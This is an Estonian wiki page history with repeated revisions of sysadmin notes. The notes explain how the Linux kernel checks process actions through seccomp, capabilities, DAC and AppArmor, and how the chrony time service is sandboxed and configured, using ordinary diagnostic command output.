Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

seccomp leiab kõneks olevad syscallid üles nn bpf-classic filtrite abil, antud juhul 23 tükki (neid ei esita bpftool prog show)

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep Seccomp
Seccomp: 2
Seccomp_filters: 23
</pre>

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-03T23:19:52Z

Imre:

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* privileegid (st õigus midagi teha, midagi kasutada) pole mitte niivõrd kasutajal, aga privileegid on protsessil
* protsessi privileegid tulenevad muu hulgast kolmest asjaolust: 1. seccomp syscall tulemüür, 2. capabilities, 3. lsm
* capability'le vastab komplekt syscallisid (tavaliselt)
* system call (syscall, 'make system call') - xxx

Syscallisid on üldiselt kahesuguseid

* Automatic Syscalls: Actions like mmap(), read(), or brk() are considered "safe." The kernel assumes that if you have the memory or the file handle, you can perform these actions. No special "permission" is needed beyond standard file permissions.
* Restricted Syscalls: Actions like clock_adjtime(), reboot(), or mount() are "dangerous." Historically, the kernel had a simple rule: if (uid == 0) (Root), allow; else, deny.

Väited syscall kasutamise kohta

* kui tavakasutaja tegeleb omale kuuluva tekstifaili sisu muutmisega, siis ta esmalt sooritab open() syscalli ja seda üldiselt lubatakse kõigil kasutajatel teha, seejuures saab süsteem teada, kas kasutajal on lubatud kõnealuse failiga tegeleda ja mil viisil jne; ja edasi kasutaja ütleb read() syscall'i: read() iseenesest vajab tugevaid lube töötamiseks, aga süsteem tuletab loa protsessi omaniku/grupi kõrvutamisest faili omaniku/grupi ja loabittidega - näiliselt tundub, et read(), write() jt selliste syscallide kasutamine toimub väga liberaalselt (käigult konstrueeritakse efektiivselt sobivad capacitid)
* kui kasutaja root käivitab tekstireadaktori asub tegelema tekstifaili sisu muutmisega, siis toimub sarnane kontroll kuid see annab väga jaatava vastuse kuna kasutaja on root (uid=0) - kernelil on kasutada loogika, et kui kasutaja on root siis see on samaväärne kõigi capacitite olemasoluga

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===gemini joonis===

<pre>
[ PROCESS ]
|
| 1. SECCOMP GATE (The Vocabulary Check)
| "Is this syscall even allowed to be uttered?"
| [ Filter: 23 active ] ---------------------> [ REJECT / SIGSYS ]
|
v
| 2. CAPABILITIES GATE (The Authority Check)
| "Does this process hold the specific bit for this action?"
| [ e.g., CAP_SYS_TIME ] --------------------> [ REJECT / EPERM ]
|
v
| 3. DAC / ACL GATE (The Identity Check)
| "Is the process UID/GID on the list for this file/device?"
| [ Feature: +ACL ] -------------------------> [ REJECT / EACCES ]
|
v
| 4. LSM / MAC GATE (The Policy "Horizon")
| "Does the overall security policy permit this role this access?"
| [ AppArmor / SELINUX ] --------------------> [ REJECT / DENIED ]
|
v
[ RESOURCE ] (e.g., /dev/sda, System Clock, Network Socket)
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===Capabilities - 2026 kevad märkmed===

Väited

* teatud mõttes capabilities laiendab nö klassikaliselt setuid lahendust (mis võimaldab faili omaduste alusel tuletada protsessi käivitamise jaoks sobivad privileegid - tavaliselt tavakasutaja -> root kasutaja)
* võimalik on tekitada tavakasutajale kuuluva protsessi, mis on binditud privilegeeritud st <1024 port külge
* teatud määral päritakse capabilitied parent protsessi käest child protsessi poolt

capabilities saab toimuda kahe nö allika põhiselt

* faili xattr alusel staatiliselt
* kõrgema privileegiga protsessi poolt väljakutsutud viisil dünaamiliselt (nt systemd service unit)

systemd puhul tavaliselt seadistatakse alumime ja ülemine lagi privileegidega

<pre>
root@zabbix-pub-01:~# systemctl show systemd-resolved | grep Capab
CapabilityBoundingSet=cap_setpcap cap_net_bind_service cap_net_raw
AmbientCapabilities=cap_setpcap cap_net_bind_service cap_net_raw

root@zabbix-pub-01:~# egrep -r AmbientCapabilities /lib/systemd/
/lib/systemd/system/e2scrub_reap.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/e2scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_SYS_RAWIO
/lib/systemd/system/xfs_scrub@.service:AmbientCapabilities=CAP_SYS_ADMIN CAP_FOWNER CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_SYS_RAWIO
/lib/systemd/system/systemd-timesyncd.service:AmbientCapabilities=CAP_SYS_TIME
/lib/systemd/system/systemd-networkd.service:AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW
/lib/systemd/system/systemd-resolved.service:AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE
</pre>

Parasjagu olevat protsesside seisu capability mõttes esitab pscap programm, nt

<pre>
root@zabbix-pub-01:~# apt-get install libcap-ng-utils
root@zabbix-pub-01:~# pscap -a
ppid pid uid command capabilities
0 1 root systemd full +
1 344 root systemd-journal chown, dac_override, dac_read_search, fowner, setgid, setuid, sys_ptrace, sys_admin, audit_control, mac_override, syslog, audit_read +
1 395 root multipathd full +
1 413 root systemd-udevd chown, dac_override, dac_read_search, fowner, fsetid, kill, setgid, setuid, setpcap, linux_immutable, net_bind_service, net_broadcast, net_admin, net_raw, ipc_lock, ipc_owner, sys_module, sys_rawio, sys_chroot, sys_ptrace, sys_pacct, sys_admin, sys_boot, sys_nice, sys_resource, sys_tty_config, mknod, lease, audit_write, audit_control, setfcap, mac_override, mac_admin, syslog, block_suspend, audit_read, perfmon, bpf, checkpoint_restore +
1 562 systemd-network systemd-network net_bind_service, net_broadcast, net_admin, net_raw @ +
1 577 systemd-resolve systemd-resolve net_raw @ +
1 593 systemd-timesync systemd-timesyn sys_time @ +
1 715 messagebus dbus-daemon audit_write +
1 719 root php-fpm8.3 full +
1 724 root qemu-ga full +
1 733 root systemd-logind chown, dac_override, dac_read_search, fowner, linux_immutable, sys_admin, sys_tty_config, audit_control, mac_admin +
...
</pre>

====Dünaamiline capability====

Ühes aknas öeldakse

<pre>
root@zabbix-pub-01:~# capsh --keep=1 --user=nobody --inh=cap_chown --addamb=cap_chown --caps="cap_chown=eip" -- -c "sleep 60"
</pre>

ja teises küsitakse

<pre>
root@zabbix-pub-01:~# ps aux | grep sleep
nobody 216107 0.0 0.1 5692 2196 pts/0 S+ 00:45 0:00 sleep 60

root@zabbix-pub-01:~# grep -i cap /proc/216107/status
CapInh: 0000000000000001
CapPrm: 0000000000000001
CapEff: 0000000000000001
CapBnd: 000001ffffffffff
CapAmb: 0000000000000001
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T23:18:27Z

Imre: /* Misc - chrony protsess */

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc - chrony protsess===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

kus

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

ning capabilities

<pre>
root@pve-svc-02:~# pscap -p 1436092
ppid pid uid command capabilities
1 1436092 _chrony chronyd net_bind_service, sys_time +

root@pve-svc-02:~# pscap -p 1436093
ppid pid uid command capabilities
1436092 1436093 _chrony chronyd net_bind_service, sys_time +
</pre>

või getpcaps abil (ep - effective, permitted)

<pre>
root@pve-svc-02:~# getpcaps 1436092
1436092: cap_net_bind_service,cap_sys_time=ep
</pre>

või /proc/PID/status abil

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep ^Cap
CapInh: 0000000000000000
CapPrm: 0000000002000400
CapEff: 0000000002000400
CapBnd: 000001c08380fddf
CapAmb: 0000000000000000

root@pve-svc-02:~# capsh --decode=0000000002000400
0x0000000002000400=cap_net_bind_service,cap_sys_time
</pre>

kus

* CapInh: Inheritable (can be passed to children).
* CapPrm: Permitted (the maximum "credit limit" of authority).
* CapEff: Effective (the authority currently being used).
* CapBnd: Bounding (the hard ceiling that cannot be exceeded).
* CapAmb: Ambient (applies to unprivileged non-setuid binaries).

ning

<pre>

</pre>

ning systemd vastavad seadistused

<pre>
root@pve-svc-02:~# systemctl show chrony | egrep "^Prot|^Priv|^Capab" | egrep "restore$|yes$"
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_setgid cap_setuid cap_setpcap cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner cap_sys_nice cap_sys_resource cap_sys_time cap_setfcap cap_perfmon cap_bpf cap_checkpoint_restore
PrivateTmp=yes
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectKernelLogs=yes
ProtectControlGroups=yes
ProtectControlGroupsEx=yes
ProtectHome=yes
ProtectHostname=yes
</pre>

===Misc - chrony teenus===

Seadistus

<pre>
root@pve-svc-02:~# egrep "pool|server" /etc/chrony/chrony.conf
# pool 2.debian.pool.ntp.org iburst

root@pve-svc-02:~# cat /etc/chrony/sources.d/local-ntp-server.sources
server 10.192.0.53 iburst
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T23:16:34Z

Imre: /* Misc - chrony protsess */

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc - chrony protsess===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

kus

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

ning capabilities

<pre>
root@pve-svc-02:~# pscap -p 1436092
ppid pid uid command capabilities
1 1436092 _chrony chronyd net_bind_service, sys_time +

root@pve-svc-02:~# pscap -p 1436093
ppid pid uid command capabilities
1436092 1436093 _chrony chronyd net_bind_service, sys_time +
</pre>

või getpcaps abil

<pre>
root@pve-svc-02:~# getpcaps 1436092
1436092: cap_net_bind_service,cap_sys_time=ep
</pre>

või /proc/PID/status abil

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep ^Cap
CapInh: 0000000000000000
CapPrm: 0000000002000400
CapEff: 0000000002000400
CapBnd: 000001c08380fddf
CapAmb: 0000000000000000

root@pve-svc-02:~# capsh --decode=0000000002000400
0x0000000002000400=cap_net_bind_service,cap_sys_time
</pre>

kus

* CapInh: Inheritable (can be passed to children).
* CapPrm: Permitted (the maximum "credit limit" of authority).
* CapEff: Effective (the authority currently being used).
* CapBnd: Bounding (the hard ceiling that cannot be exceeded).
* CapAmb: Ambient (applies to unprivileged non-setuid binaries).

ning

<pre>

</pre>

ning systemd vastavad seadistused

<pre>
root@pve-svc-02:~# systemctl show chrony | egrep "^Prot|^Priv|^Capab" | egrep "restore$|yes$"
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_setgid cap_setuid cap_setpcap cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner cap_sys_nice cap_sys_resource cap_sys_time cap_setfcap cap_perfmon cap_bpf cap_checkpoint_restore
PrivateTmp=yes
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectKernelLogs=yes
ProtectControlGroups=yes
ProtectControlGroupsEx=yes
ProtectHome=yes
ProtectHostname=yes
</pre>

===Misc - chrony teenus===

Seadistus

<pre>
root@pve-svc-02:~# egrep "pool|server" /etc/chrony/chrony.conf
# pool 2.debian.pool.ntp.org iburst

root@pve-svc-02:~# cat /etc/chrony/sources.d/local-ntp-server.sources
server 10.192.0.53 iburst
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T23:14:21Z

Imre: /* Misc - chrony protsess */

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc - chrony protsess===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

kus

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

ning capabilities

<pre>
root@pve-svc-02:~# pscap -p 1436092
ppid pid uid command capabilities
1 1436092 _chrony chronyd net_bind_service, sys_time +

root@pve-svc-02:~# pscap -p 1436093
ppid pid uid command capabilities
1436092 1436093 _chrony chronyd net_bind_service, sys_time +
</pre>

või getpcaps abil

<pre>
root@pve-svc-02:~# getpcaps 1436092
1436092: cap_net_bind_service,cap_sys_time=ep
</pre>

ning systemd vastavad seadistused

<pre>
root@pve-svc-02:~# systemctl show chrony | egrep "^Prot|^Priv|^Capab" | egrep "restore$|yes$"
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_setgid cap_setuid cap_setpcap cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner cap_sys_nice cap_sys_resource cap_sys_time cap_setfcap cap_perfmon cap_bpf cap_checkpoint_restore
PrivateTmp=yes
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectKernelLogs=yes
ProtectControlGroups=yes
ProtectControlGroupsEx=yes
ProtectHome=yes
ProtectHostname=yes
</pre>

===Misc - chrony teenus===

Seadistus

<pre>
root@pve-svc-02:~# egrep "pool|server" /etc/chrony/chrony.conf
# pool 2.debian.pool.ntp.org iburst

root@pve-svc-02:~# cat /etc/chrony/sources.d/local-ntp-server.sources
server 10.192.0.53 iburst
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
